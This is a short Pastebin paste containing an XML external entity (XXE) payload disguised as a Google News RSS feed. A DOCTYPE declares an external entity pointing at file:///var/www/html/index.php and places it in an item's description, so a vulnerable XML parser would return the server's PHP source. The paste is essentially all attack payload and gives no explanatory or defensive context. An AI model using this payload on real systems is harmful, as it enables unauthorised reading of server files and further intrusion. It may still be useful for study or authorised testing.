Advertisement
Guest User

Untitled

a guest
Nov 11th, 2019
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE foo [ <!ELEMENT foo ANY >
  3. <!ENTITY xxe SYSTEM "file:///var/www/html/index.php" >]>
  4. <rss xmlns:media="http://search.yahoo.com/mrss/" version="2.0">
  5. <channel>
  6. <title>Top-Meldungen - Google News</title>
  7. <description>Google News</description>
  8. <item>
  9. <title>Grundrente</title>
  10. <description>&xxe;</description>
  11. </item>
  12. </channel>
  13. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement